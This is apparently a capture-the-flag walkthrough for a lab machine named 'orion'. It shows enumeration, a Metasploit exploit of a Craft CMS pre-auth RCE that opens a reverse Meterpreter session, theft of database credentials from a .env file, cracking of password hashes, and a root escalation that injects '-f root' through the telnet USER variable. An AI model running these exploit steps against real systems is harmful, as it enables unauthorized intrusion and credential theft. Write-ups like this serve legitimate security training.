Enumeration
$ nmap -sCV 10.129.x.x
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://orion.htb/
$ echo "10.129.x.x orion.htb" | sudo tee -a /etc/hosts
Directory fuzzing confirms the admin panel at /admin. The login page footer discloses Craft CMS 5.6.16, which is vulnerable to unauthenticated RCE via CVE-2025-32432.
$ ffuf -u http://orion.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic
admin [Status: 302]
Foothold
CVE-2025-32432 abuses CraftCMS’s image transformation endpoint, which passes attacker-controlled JSON into Yii’s object configuration system. Three values are needed: CraftSessionId cookie, CRAFT_CSRF_TOKEN cookie, and csrfTokenValue — all obtained from a single GET to /admin/login.
$ msfconsole
msf > use exploit/linux/http/craftcms_preauth_rce_cve_2025_32432
msf exploit(...) > set rhosts orion.htb
msf exploit(...) > set rport 80
msf exploit(...) > set lhost 10.10.14.x
msf exploit(...) > exploit
[+] Leaked session.save_path: /var/lib/php/sessions
[*] Meterpreter session 1 opened
meterpreter > shell
$ script /dev/null -c /bin/bash
www-data@orion:~/html/craft$
Privilege Escalation
www-data → adam
www-data@orion:~/html/craft$ cat .env
CRAFT_DB_USER=root
CRAFT_DB_PASSWORD=SuperSecureCraft123Pass!
www-data@orion:~/html/craft$ mysql -u root -pSuperSecureCraft123Pass! orion \
-e "select username,email,password from users;"
| admin | adam@orion.htb | $2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS |
$ hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
$2y$13$...:<REDACTED>
$ ssh adam@orion.htb
adam@orion:~$ cat user.txt
<REDACTED>
adam → root
adam@orion:~$ netstat -tulnp
tcp 127.0.0.1:23 LISTEN
Port 23 is GNU inetutils 2.7 telnetd, vulnerable to CVE-2026-24061. Setting USER to -f root passes -f root to login(1), which skips password authentication entirely.
adam@orion:~$ USER="-f root" telnet -a 127.0.0.1
root@orion:~# cat root.txt
<REDACTED>
// Discussion